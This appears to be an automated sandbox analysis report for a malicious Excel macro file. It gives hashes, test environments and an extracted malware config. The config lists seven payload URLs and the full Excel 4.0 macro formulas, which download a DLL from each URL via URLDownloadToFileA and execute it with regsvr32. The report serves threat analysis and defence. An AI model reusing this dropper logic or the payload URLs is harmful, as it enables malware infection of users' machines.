Behavioral task
behavioral1
Sample
eb1b1f24745953db908595cd2b1854cd5c6e62356319b61e43bc7f0714f8ab0d.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
eb1b1f24745953db908595cd2b1854cd5c6e62356319b61e43bc7f0714f8ab0d.xlsm
Resource
win10v2004-20241007-en
General
-
Target
eb1b1f24745953db908595cd2b1854cd5c6e62356319b61e43bc7f0714f8ab0d
-
Size
35KB
-
MD5
1909a5fa37d26c68daf7d52c0a22d351
-
SHA1
228669309cbcbecd913acbe657858908d3fda9af
-
SHA256
eb1b1f24745953db908595cd2b1854cd5c6e62356319b61e43bc7f0714f8ab0d
-
SHA512
7d0b66ff4f1eaff10b50ebd1a54e6dd0a1c04477d077d01c401fdf7e57cac70cda50a6a7f6574b794e3d0ecc908e17debded45590840db7e7d2b41372009c56b
-
SSDEEP
768:aYKtm5eMn7AjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooXLR:aYKtmg+UOZZ1ZYpoQ/pMAm
Malware Config
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/
https://directorkay.com.ng/wp-admin/MYP3NA/
https://deatravel.al/wp-includes/H544R/
https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/
https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/
https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casinojackpotking.com/cgi-bin/47sKbklSQf31/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://directorkay.com.ng/wp-admin/MYP3NA/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://deatravel.al/wp-includes/H544R/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()
Signatures
Files
-
eb1b1f24745953db908595cd2b1854cd5c6e62356319b61e43bc7f0714f8ab0d.xlsm office2007